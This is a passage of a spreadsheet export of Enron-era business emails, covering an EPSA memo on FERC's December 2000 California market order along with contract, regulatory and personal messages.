Please provide me with your current personal ENE stock holdings as of 3/31/01.   I have access to shares held in the Company Plans (last bullet above).  Please respond by Friday, April 6, 2001._x000D_
_x000D_
Please contact me if you have any questions._x000D_
_x000D_
Thank you so much_x000D_
_x000D_
_x000D_
Mary E. McKendree_x000D_
Executive Compensation_x000D_
713-345-8085_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Dec 2000 00:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'cynthia.sandherr@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'susan.j.mara@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>Possible EPSA Response to FERC's December 15th Order</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sarah Novosel/Corp/Enron on 12/29/2000 08:58 AM -----_x000D_
_x000D_
	"Jackie Gallagher" &lt;JGallagher@epsa.org&gt;_x000D_
	12/21/2000 05:01 PM_x000D_
		 _x000D_
		 To: &lt;bhawkin@enron.com&gt;, &lt;bmerola@enron.com&gt;, &lt;christi.l.nicolay@enron.com&gt;, _x000D_
&lt;donna.fulton@enron.com&gt;, &lt;janelle.scheuer@enron.com&gt;, _x000D_
&lt;jeff_brown@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;Mary.Hain@enron.com&gt;, _x000D_
&lt;sarah.novosel@enron.com&gt;, &lt;tom.hoatson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Possible EPSA Response to FERC's December 15th Order_x000D_
_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Regulatory Affairs Committee_x000D_
       Power Marketers Working Group_x000D_
_x000D_
FROM: Don Santa, Regulatory Affairs Committee Chair_x000D_
             Joe Hartsoe, Power Marketing Working Group Chair_x000D_
             Julie Simon, Vice President of Policy_x000D_
_x000D_
DATE: December 21, 2000_x000D_
_x000D_
RE: Possible EPSA Response to FERC's December 15th Order_x000D_
      Directing Remedies for California Wholesale Electric_x000D_
      Markets_x000D_
      ? Conference Call Scheduled for Wednesday, January 3rd_x000D_
        at 2:00 p.m. (EST)_x000D_
_x000D_
On December 15th, FERC issued an Order Directing Remedies for California _x000D_
Wholesale Electric Markets.  The Order retains many features of the _x000D_
Commission's November 1st order outlining proposed remedies for the _x000D_
California markets.  However, there are several aspects of this Order which _x000D_
vary from the earlier proposal.  EPSA has previously forwarded FERC's press _x000D_
release outlining the major features of the Order, along with a brief memo _x000D_
highlighting the $74 benchmark for finding forward contracts prudent and the _x000D_
January 2nd filing requirement for forward contract offers._x000D_
_x000D_
We need to consider whether EPSA should seek rehearing or clarification of _x000D_
any aspect of this Order.  Filings would be due at FERC no later than January _x000D_
15th.  Based on a review of the order, there are limited issues on which EPSA _x000D_
might seek rehearing, included the continued finding that the rates in _x000D_
California were unjust and unreasonable and the removal of opportunity costs _x000D_
as a basis for justifying prices above the $150 benchmark.  We will discuss _x000D_
these issues on our next weekly conference call, which is scheduled for _x000D_
Wednesday, January 3rd at 2:00 p.m. (EST).  If you have additional issues you _x000D_
want EPSA to raise, please forward them to Julie Simon at 202-789-7200 or at _x000D_
jsimon@epsa.org before the call.  To access the call, dial 1-800-937-6563 and _x000D_
ask for the Julie Simon/EPSA Call._x000D_
_x000D_
December 15th Order_x000D_
_x000D_
Finding that the "electric power situation in California has worsened since _x000D_
the November 1 order was issued," the December 15th Order retained many of _x000D_
the proposals contained in its November 1st order, as well as new remedial _x000D_
measures.  Briefly summarized, the order includes the following measures:_x000D_
_x000D_
? Elimination of the requirement that California utilities buy and sell power _x000D_
through the Power Exchange (PX).  This modification to the California market _x000D_
structure returns the 25,000 MWs of generation owned by the IOUs to the rate _x000D_
jurisdiction of the California PUC.  FERC also urges the California PUC to _x000D_
release the IOUs from their obligation to purchase from the PX.  The PX's _x000D_
current rate schedules are terminated as of April 30, 2001.  This new ability _x000D_
of the IOUs to self-schedule is intended to be the primary mitigation _x000D_
measures to dampen prices in California._x000D_
_x000D_
? A benchmark price for wholesale bilateral contracts, set at $74/MWh for _x000D_
five-year, round-the-clock arrangements.  The Commission hopes that _x000D_
establishing a level at which purchases can be deemed prudent will encourage _x000D_
the California PUC to do likewise.  The $74 benchmark was derived from the _x000D_
pre-restructuring, average embedded cost of generation in California. To _x000D_
corroborate the benchmark, and make adjustments as necessary, the Commission _x000D_
directed all sellers with market-based rate authority to report, no later _x000D_
than January 2, 2001, on a confidential basis, round-the-clock long-term _x000D_
products in annual increments between two and five years which they are _x000D_
willing to offer in California.  These informational reports should include _x000D_
price, terms and conditions, and amounts.  This information can also be _x000D_
reported on a non-confidential basis._x000D_
_x000D_
? Addition of a penalty for scheduling imbalances of more than five percent _x000D_
in the real-time energy market._x000D_
_x000D_
? Market monitoring and price mitigation for the residual real-time market, _x000D_
including modifications to the single price auction that preclude bids over _x000D_
$150/MWh from setting the market clearing price.  The November 1st Order had _x000D_
proposed this remedy for a two-year period, which has been shortened to four _x000D_
months in this Order.  The Commission will convene a technical conference, no _x000D_
later than January 25th, to develop a "comprehensive and systematic _x000D_
monitoring and mitigation program which incorporates thresholds and screens _x000D_
and specific mitigation measures if those thresholds and screens are _x000D_
breached."  A proposed plan is due by March 1, 2001 so that it can be in _x000D_
place by May 1, 2001.   An important modification to the November 1st _x000D_
proposal, suggested by EPSA, is that the review period for sales over $150 _x000D_
will be limited to 60 days._x000D_
_x000D_
? Imposed a reporting requirement on the ISO and PX and jurisdictional _x000D_
sellers on sales over the $150/MWh "breakpoint."_x000D_
_x000D_
? Elimination of the stakeholder boards of the ISO in favor of independent _x000D_
boards.  The directive for replacing ISO board has been modified to requiring _x000D_
the current governing board to relinquish decision-making power and operating _x000D_
control to the ISO management on January 29, 2001, although the governing _x000D_
board can continue to function as an advisory board.  The issue will be _x000D_
addressed and resolved in the context of the anticipated January 15th RTO _x000D_
filing._x000D_
_x000D_
? Requiring the ISO and the three IOUs to develop and file generation _x000D_
interconnection procedures._x000D_
_x000D_
Much of the Order is focused on eliminating the PX mandatory buy-sell _x000D_
requirement and incenting more forward contracting, with the goal of _x000D_
shrinking the real-time market to the extent possible.  The Commission stated:_x000D_
_x000D_
We cannot emphasize enough that the California Commission must act decisively _x000D_
and immediately to eliminate the requirement for the IOUs to buy the balance _x000D_
of their load from PX.  This is the most serious flaw in the market design _x000D_
created by AB1890 and the California Commission's implementing orders.  _x000D_
Continued delay in making this fundamental change places all other aspects of _x000D_
our remedial plan at risk, and prolongs the dysfunction of this market.  In _x000D_
addition it is critical that the California Commission move quickly to _x000D_
provide the IOUs with approval of their forward purchases.  The specter of _x000D_
after-the-fact disallowance for transactions other than PX purchases has _x000D_
certainly chilled the decision-making process and continues to subject _x000D_
California's ratepayers to the volatility of spot prices.  California is in a _x000D_
state of economic emergency, and there is little chance that the IOUs will _x000D_
rise to the task if they are not afforded certainty._x000D_
_x000D_
The Commission went on:_x000D_
_x000D_
Some parties to this proceeding argue that the prices in the forward markets _x000D_
will be affected by last summer's spiraling spot prices and should therefore _x000D_
be deemed unreasonable.  We do not agree.  Sellers will certainly be aware _x000D_
that supplies of power are tight and that the IOUs are now aggressively _x000D_
seeking to avoid the exposure of the spot markets.  Under these _x000D_
circumstances, . . . , we will be vigilant in monitoring the possible _x000D_
exercise of market power.  However, suppliers also benefit from the stable _x000D_
revenue stream of forward markets and have every bit as much incentive to _x000D_
avoid the volatility of spot markets as do purchasers.  Moreover, suppliers _x000D_
will bargain knowing that the spot market's size will be greatly reduced and _x000D_
that next summer's spot prices will therefore not be fueled by frenzied _x000D_
buyers whose over-reliance on last minute purchases have forced them to bid _x000D_
up the prices to obtain needed supply._x000D_
_x000D_
On the issue of the $150 "breakpoint," the Commission pointed out that it is _x000D_
intended to be a "safety net" for a vastly reduced spot market.  The _x000D_
Commission emphasized that "by design and definition, spot markets must be _x000D_
allowed to reflect the price swings which capture their temporal nature."  _x000D_
Since spot market prices are subject to dramatic drops in times of surplus, _x000D_
and increases in times of shortage, "those who remain in the spot market for _x000D_
buying their residual load or selling their residual supply should be there _x000D_
in full recognition of the effects on price of last minute sales and _x000D_
purchases."_x000D_
_x000D_
In discussing plans for careful market monitoring and review of sales over _x000D_
the breakpoint, the Commission announced plans to look at outage rates for _x000D_
the seller's resources, failure to bid unsold megawatts into the real-time _x000D_
market, and variations in bidding patterns.  The order recognizes that _x000D_
sellers may bid above their marginal costs in times of scarcity, but does not _x000D_
expressly include the concept of opportunity costs, which were included in _x000D_
the November 1st Order.  On an issue that EPSA raised, the Commission _x000D_
concluded that the review of as-bid transactions will close within 60 days _x000D_
after the report is filed with FERC.  Unless notified by the Commission or _x000D_
its staff, transactions will be considered final and not subject to _x000D_
mitigation or other refund liability after the 60-day period._x000D_
_x000D_
In response to requests to revise or clarify the finding in the November 1st _x000D_
order that the flawed market rules in California "have caused, and continue _x000D_
to have the potential to cause, unjust and unreasonable rates for short-term _x000D_
energy," the Commission clarified that the November 1st order "did not find _x000D_
that all rates, at all times, were unjust and unreasonable in these spot _x000D_
markets."  The Commission points out that:_x000D_
_x000D_
We have been faced in this case with the difficult question of what makes a _x000D_
market-based rate unjust and unreasonable.  There is no precise legal _x000D_
formulation for setting a just and reasonable rate and no precise bright line _x000D_
for when a rate becomes unjust and unreasonable. Under long-standing Supreme _x000D_
Court case law, rates must fall within a zone of reasonableness where the _x000D_
rates are neither so low as to be "less than compensatory" nor so high as to _x000D_
be "excessive" to consumers.  While high prices in and of themselves do not _x000D_
make a rate unjust and unreasonable (because, for instance, underlying _x000D_
production prices may be high), if over time rates do not behave as expected _x000D_
in a competitive market, the Commission must step in to correct the situation._x000D_
_x000D_
The Commission goes on to conclude that it has no evidence of specific abuses _x000D_
of market power.  However, other circumstances, such as over reliance of spot _x000D_
markets and a supply and demand imbalance, can lead to rates being excessive _x000D_
relative to the benchmark of producer costs or competitive market prices and _x000D_
a finding that prices are not just and reasonable.  In other words, even in _x000D_
the absence of market power abuses, prices are not necessarily just and _x000D_
reasonable._x000D_
_x000D_
Possible Area for Comment_x000D_
_x000D_
Overall, the December 15th Order is consistent with the comments filed by _x000D_
EPSA in response to the November 1st Order.  The Order largely strikes a _x000D_
reasonable balance between principles and political practicality, with the _x000D_
Commission bending very little in response to intense political pressure from _x000D_
California.  Specifically, the Order does not find abuse of market power, _x000D_
order refunds, or impose California or regional price caps.  However, there _x000D_
are two issues that remain troubling:_x000D_
_x000D_
1. The Commission reiterates its earlier conclusion that rates were not just _x000D_
and reasonable under certain circumstances in California.  While we argued _x000D_
strenuously against this conclusion in our November 22nd comments and the _x000D_
Commission "clarified" its early findings in this Order, the implications of _x000D_
this conclusion continue to have significant adverse political _x000D_
ramifications.  Without merely repeating our early arguments, we should _x000D_
consider taking another run at this issue._x000D_
_x000D_
2. The November 1st Order expressly provided for opportunity cost as a _x000D_
justification for prices above the $150 breakpoint.  The reference to _x000D_
opportunity costs has been deleted from this Order, apparently based on a _x000D_
belief that opportunity costs don't exist in real-time.  If we can make a _x000D_
credible case that sellers can sell out of California into other Western _x000D_
markets in a real-time or next-hour market, we may want to ask the Commission _x000D_
to reconsider allowing opportunity costs as a justification for prices over _x000D_
the $150 breakpoint._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Feb 2002 08:32:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jlokay@yahoo.com'})</t>
  </si>
  <si>
    <t>Special delivery from Marble Slab Creamery!</t>
  </si>
  <si>
    <t>You have been sent a virtual Marble Slab Creamery Ice_x000D_
Cream Cone!  It was sent to you by Mr. Lokay at jlokay@yahoo.com_x000D_
_x000D_
To pick up your cone, visit the Pick-Up Window at_x000D_
http://www.marbleslab.com/cone/pickup.htm and enter your_x000D_
special code:   563210271102</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 01:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: VEPCO files Interconnection Proc. at FERC</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 11/09/2000 09:06 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Christi L Nicolay@ECT_x000D_
11/07/2000 01:19 PM_x000D_
To: Ozzie Pagan/HOU/ECT@ECT_x000D_
cc: Heather Kroll/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Barbara N _x000D_
Gray/HOU/ECT@ECT, Lloyd Will/HOU/ECT@ECT, Mitch Robinson/Corp/Enron@Enron, _x000D_
Patrick Hanse/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, _x000D_
Kay Mann/Corp/Enron@Enron, Larry Soderquist/HOU/ECT@ECT, Bill _x000D_
Rust/HOU/ECT@ECT, James D Steffes/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Sarah Novosel/Corp/Enron@ENRON, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Donna Fulton/Corp/Enron@ENRON, Mary _x000D_
Hain/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: VEPCO files Interconnection Proc. at FERC  _x000D_
_x000D_
FYI.  The VEPCO attorney said that currently VEPCO is taking about 60 days _x000D_
each for the System Impact Study and the Facilities Study.  Because of the _x000D_
increase in study requests, VEPCO is filing for 90 days for Fac. Studies, _x000D_
below._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Christi L Nicolay                           11/06/2000 02:29 PM_x000D_
	_x000D_
_x000D_
To: Ozzie Pagan/HOU/ECT@ECT, Heather Kroll/HOU/ECT@ECT, Bob _x000D_
Carter/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, Lloyd Will/HOU/ECT@ECT, Mitch _x000D_
Robinson/Corp/Enron@Enron, Patrick Hanse/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, _x000D_
Barton Clark/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron, Larry _x000D_
Soderquist/HOU/ECT@ECT, Bill Rust/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Donna _x000D_
Fulton/Corp/Enron@ENRON, Mary Hain/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: VEPCO files Interconnection Proc. at FERC_x000D_
_x000D_
On 10/27/00, VEPCO filed interconnection procedures at FERC (Docket No. _x000D_
ER01-247)(Protests due 11/17/00).  These largely mirror CP&amp;L's _x000D_
interconnection procedures that were recently approved by FERC.  Therefore, I _x000D_
do not think that Enron should protest or intervene._x000D_
_x000D_
Customer is required to pay for the cost of a new system impact/facilities _x000D_
study if the study information/interconnection/upgrade costs change due to a _x000D_
customer higher in the queue losing its queue spot._x000D_
System impact studies should take 60 days or less.  Facilities studies should _x000D_
take 90 days or less._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Aug 2001 13:24:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Public Service Company of Colorado / Cheyenne Light, Power Fuel &amp;_x000D_
 Power Company</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Do you have an address / contact for these customers?  I have the August confirms ready to send._x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 10:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nmanne@susmangodfrey.com'})</t>
  </si>
  <si>
    <t>duke</t>
  </si>
  <si>
    <t>I called Steve Smith and told him no re the request to put our stuff in his_x000D_
data room.  He said what do you mean.  I said I meant that to the extent_x000D_
confidentiality agreements prevented disclosure of the information he wants_x000D_
to disclose, Enron does not waive the provisions or agree to the disclosure._x000D_
He asked me on what basis we claimed that they were not free to disclose the_x000D_
information!  I told him that I assumed he would not have called me and_x000D_
asked me to get Enron's consent unless he thought he needed it; and that I_x000D_
had not analyzed which of the things he listed for me required our consent_x000D_
to disclosure.  He said he would so advise Duke and that they would make_x000D_
their own assessment of whether they were restricted from disclosing any of_x000D_
the stuff.  I said he should do whatever he felt comfortable doing in light_x000D_
of my categorical statement that they did not have our consent or agreement._x000D_
Eventually this will be more evidence of our perfidious behavior._x000D_
_x000D_
Neal S. Manne_x000D_
(713) 653-7827_x000D_
nmanne@susmangodfrey.com_x000D_
_x000D_
_x000D_
 - C.DTF</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 05:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TURBOPARK STUFF/CA Development I and II notice of exercise of_x000D_
 purchase option</t>
  </si>
  <si>
    <t xml:space="preserve">I'll send you the final doc's so we can discuss.  I generated the forms, then _x000D_
finance and the banks commented on the forms._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Karen E Jones@ECT_x000D_
01/23/2001 12:49 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: TURBOPARK STUFF/CA Development I and II notice of exercise of _x000D_
purchase option  _x000D_
_x000D_
Hi Kay.  How are things??  I'm trying to educate myself (always a scary _x000D_
proposition) on moving equipment out of TurboPark, since hopefully we will _x000D_
have the need to do that soon for Pastoria.  Any further thinking on the _x000D_
whole topic beyond what you've provided below?  Like where I can find forms _x000D_
of the B of S and Assignment docs?  And, did you do the docs, or does finance _x000D_
(I kind of assume we take the laboring oar on all of these, but thought I'd _x000D_
see what your experience proved to be).  Please give me a ring when _x000D_
convenient.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
Kay Mann@ENRON_x000D_
01/03/2001 07:03 AM_x000D_
To: Sheila Tweed/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, Dale _x000D_
Rasmussen/HOU/ECT@ECT, Alan Larsen/PDX/ECT@ECT, Karen E Jones/HOU/ECT@ECT, _x000D_
Jeffrey T Hodge/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, Bob _x000D_
Carter/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: TURBOPARK STUFF/CA Development I and II notice of exercise of _x000D_
purchase option_x000D_
_x000D_
I am working on a deal to move TurboPark equipment into Enron owned LLC's, _x000D_
with a simultaneous sale of  80% of the equity to a third party.  This deal _x000D_
is supposed to close by Jan 15, so I'm getting a crash course on TurboPark _x000D_
and how to get stuff out of it during the early phase.  I thought I would _x000D_
share what I'm learning, if nothing else as a form of therapy._x000D_
_x000D_
Attached to the email is what I believe to be the proper form of notice to _x000D_
take something out of TurboPark.  Five to fifteen business days' notice is _x000D_
required._x000D_
_x000D_
There will be other documents involved as well:_x000D_
_x000D_
Bill of Sale_x000D_
Assignment and Assumption Agreement_x000D_
UCC releases, if applicable (UCC filings are made on all delivered equipment)_x000D_
_x000D_
I suspect a consent by the equipment seller may also be required.  More to _x000D_
come on this one._x000D_
_x000D_
As I learn more about the process I will keep you advised._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/03/2001 08:52 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
01/03/2001 08:28 AM_x000D_
To: Fred Mitro/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, Rebecca _x000D_
Walker/NA/Enron@Enron, Kathleen Carnahan/NA/Enron@Enron_x000D_
cc: Catherine Clark/HOU/ECT@ECT, Lisa Bills/Corp/Enron@ENRON, Roseann _x000D_
Engeldorf/Corp/Enron@ENRON _x000D_
_x000D_
Subject: CA Development I and II notice of exercise of purchase option_x000D_
_x000D_
I am attaching a revised draft notice of intent to exercise the purchase _x000D_
option for the equipment for the CA transactions. We need two separate _x000D_
notices - one for CA I and one for CA II.  Ben/Fred/Rebecca, could you please _x000D_
prepare a draft of the two exhibits?_x000D_
 _x000D_
Lisa/Catherine/Rose, I revised the form of notice to make it track the _x000D_
participation agreement and the development and construction management _x000D_
agreement.  _x000D_
_x000D_
I've tentatively dated the notice as of this Friday.  By my calculations, _x000D_
Monday is our drop dead date since a waiver of the 5 day period is not an _x000D_
option, and the deal dies if not closed by the 15th.  _x000D_
_x000D_
Ben mentioned that I should be drafting a "release letter" for the banks _x000D_
and/or DevCo. It would be a big help if someone could point me to the section _x000D_
in the documents which set forth the requirements of the release, since I'm _x000D_
still wading through it all and haven't found the relevant language yet.  _x000D_
Also, please advise of the results of the conference call which you had with _x000D_
the lenders (?) and/or their lawyers regarding the issue._x000D_
_x000D_
I am working on the assignment and assumption agreement._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 09:06:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'a..shankman@enron.com', 'george.mcclellan@enron.com'})</t>
  </si>
  <si>
    <t>FW: WSJ front page article re: Section 29 synfuel</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
	FYI. _x000D_
-----Original Message-----_x000D_
From: Zeisler, Aaron M. [mailto:AZeisler@brobeck.com]_x000D_
Sent: Thursday, July 12, 2001 11:42 AM_x000D_
To: Farache, Olivier; Johnson, Christopher; Leit, David; Markel,_x000D_
Gregory; Schmidt, Darren; Setton, Ronit_x000D_
Cc: Brownfeld, Gail; Mcclellan, George_x000D_
Subject: WSJ front page article re: Section 29 synfuel_x000D_
_x000D_
_x000D_
Attached is a front page story from today's WSJ re: Section 29 synfuel._x000D_
Note that Dr. Paspek is quoted in the article._x000D_
_x000D_
Aaron_x000D_
_x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Aug 2001 14:11:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ksumme@isda.org'})</t>
  </si>
  <si>
    <t>frozenset({'cunningham.daniel@enron.com', 'kopelman.ken@enron.com'})</t>
  </si>
  <si>
    <t>2001 ISDA Master Agreement Protocol Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Attached, please find the following documents for your review:_x000D_
_x000D_
1.	The 2001 ISDA Master Agreement Protocol;_x000D_
2.	Annexes 1-7;_x000D_
3.	Annex 8, prepared by Bryan Murtagh;_x000D_
4.	Annex 3, prepared by Joe Carrico;_x000D_
5.	The User's Guide to Annexes 1-8;_x000D_
6.	The Force Majeure and Illegality Annex (Annex 9); and_x000D_
7.	The Practice Notes for Annex 9._x000D_
_x000D_
A separate email will follow with the tax and Euro annexes.  Please let me_x000D_
know if you have comments on the attached documents, as well as your_x000D_
thoughts on Bryan's draft of Annex 8 and Joe's draft of Annex 3.  I would be_x000D_
grateful if you could send me your comments by August 17._x000D_
_x000D_
Kimberly Summe_x000D_
Assistant General Counsel, ISDA_x000D_
tel: 212-332-1203_x000D_
_x000D_
 &lt;&lt;2001 ISDA Master Agreement Protocol.doc&gt;&gt;  &lt;&lt;Annexes 1-7 (August).DOC&gt;&gt;_x000D_
&lt;&lt;Annex 8 - 7-19-01.doc&gt;&gt;  &lt;&lt;Annex 3 amended-2.doc&gt;&gt;_x000D_
_x000D_
 &lt;&lt;User's Guide to Annexes 1-9.doc&gt;&gt;  &lt;&lt;force majeure protocol 4.DOC&gt;&gt;_x000D_
&lt;&lt;force majeure practice notes 4.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
 - 2001 ISDA Master Agreement Protocol.doc _x000D_
 - Annexes 1-7 (August).DOC _x000D_
 - Annex 8 - 7-19-01.doc _x000D_
 - Annex 3 amended-2.doc _x000D_
 - User's Guide to Annexes 1-9.doc _x000D_
 - force majeure protocol 4.DOC _x000D_
 - force majeure practice notes 4.DOC </t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 04:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'geoff.storey@enron.com', 'hunter.shively@enron.com'})</t>
  </si>
  <si>
    <t>Eastern Canada LDC gas coverage</t>
  </si>
  <si>
    <t xml:space="preserve">Geoff/Hunter,_x000D_
If this agreement works for all parties, I want to ensure this plan is _x000D_
communicated to the East/Mid-West regions to provide communication across the _x000D_
Enron created regional boundaries._x000D_
_x000D_
Please advise._x000D_
_x000D_
Thanx,_x000D_
Laura_x000D_
----- Forwarded by Laura Luce/Corp/Enron on 02/12/2001 12:00 PM -----_x000D_
_x000D_
	Eric LeDain@ECT_x000D_
	01/29/2001 04:02 PM_x000D_
		 _x000D_
		 To: Laura Luce/Corp/Enron@Enron_x000D_
		 cc: Rob Milnthorp/CAL/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Jonathan _x000D_
McKay/CAL/ECT@ECT_x000D_
		 Subject: Eastern Canada LDC gas coverage_x000D_
_x000D_
Laura,_x000D_
Geoff and I talked over the coverage on the eastern Canada LDC's (Union and _x000D_
Consumers in particular)._x000D_
_x000D_
Presently the following occurs:_x000D_
i) Calgary origination covers eastern industrials and some structured LDC _x000D_
business (eg. asset mgmt or unbundling issues);_x000D_
ii) Calgary trading covers one month Empress sales to the LDC's;_x000D_
iii) Geoff and his middle marketers cover Union and Consumers for mid market _x000D_
storage or transport plays in Ontario (or the US for Union and Consumers _x000D_
assets in the US), plus US gas supply into Panhandle or ANR transport held by _x000D_
the LDC's.  Geoff of course also does the Dawn, Parkway etc. trades.  Calgary _x000D_
origination also does some mid market deals with Union._x000D_
_x000D_
 _x000D_
Canada origination is in the process of hiring a director and manager for the _x000D_
Toronto office to cover gas eastern LDC's and industrials.  Offers went out _x000D_
to these individuals last week._x000D_
_x000D_
Here's what we would see as the going forward arrangement:_x000D_
i) The new Toronto based originators, with support from Calgary origination, _x000D_
will handle all structured products with the eastern LDC 's.   This would _x000D_
include longer term transport and storage arrangements and unbundling _x000D_
services, risk management products, and term commodity sales or purchases, _x000D_
physical and financial.   Basic middle market deals within Canada would be _x000D_
done by the Toronto originators working with Geoff, just as any middle _x000D_
marketer dealing with the trader.  There would be on-going coordination with _x000D_
Geoff et al in Houston to make this work;_x000D_
ii) Calgary trading will continue to cover one month Empress sales;_x000D_
iii) All gas supply for the LDC's bought to be put onto their US pipes, will _x000D_
be done out of Houston by Geoff et al.  Toronto would be advised of any _x000D_
transactions just to be kept up to date on the LDC's actions;_x000D_
iv) Shorter term (seasonal or less) storage or pipe positions taken by Geoff _x000D_
to manage trading positions in Ontario or the border points, or to create _x000D_
opportunities, will continue to be done by Geoff et al.  For any longer term _x000D_
positions, Toronto origination and Geoff will work together to ensure value _x000D_
is maximized._x000D_
_x000D_
Laura, please give me a call (403-974-6741) with any questions on this._x000D_
Geoff, if anything doesn't look right, let me know._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 02:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Energy Systems Update</t>
  </si>
  <si>
    <t xml:space="preserve">Energy Systems Update for Wednesday, May 9 at 8:00am:_x000D_
The California Independent System Operator has declared a "WARNING" which_x000D_
will extend though the hour 2359 due to forecasted high loads and_x000D_
temperatures throughout the control area._x000D_
_x000D_
Consumers are requested to voluntarily curtail nonessential electric load to_x000D_
avoid more severe conditions including involuntary curtailments._x000D_
_x000D_
ISO may be required to call a Stage 2 including nonfirm by mid-morning.  The_x000D_
ISO indicated a Stage 3 emergency and firm load shedding is possible today._x000D_
_x000D_
If outages occur they will begin with Block 1._x000D_
_x000D_
Communications are expected to be similiar to yesterday. Any further_x000D_
specific changes in operating conditions will be communicated with_x000D_
additional Grid Updates._x000D_
_x000D_
Please note updated web link below._x000D_
http://www.pge.com/customer_services/business/nonfirm/index.html_x000D_
_x000D_
For up-to-date information regarding the current status of the California_x000D_
Energy Crisis, please log into Pacific Gas and Electric Company's Web Site_x000D_
at: http://www.pge.com/customer_services/business/nonfirm/index.html  or the_x000D_
CAISO Web Site at: &lt;&lt;&lt;&lt;http://www.caiso.com/&gt;&gt;&gt;&gt;_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 04:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: READ THE STORY FIRST then open the picture</t>
  </si>
  <si>
    <t>no but i do have great legs</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENA Litigation Status Report</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is an updated ENA Litigation Status Report._x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 May 2000 00:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'espinosa_miguel@gsb.stanford.edu'})</t>
  </si>
  <si>
    <t>Re: Kimzey's Bachelor Party</t>
  </si>
  <si>
    <t>I will be able to make it and will be making my plant arrangements today.  _x000D_
Thanks_x000D_
Ben</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 10:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Reorganization of Houston and Omaha Facilities Management_x000D_
 Responsibilities</t>
  </si>
  <si>
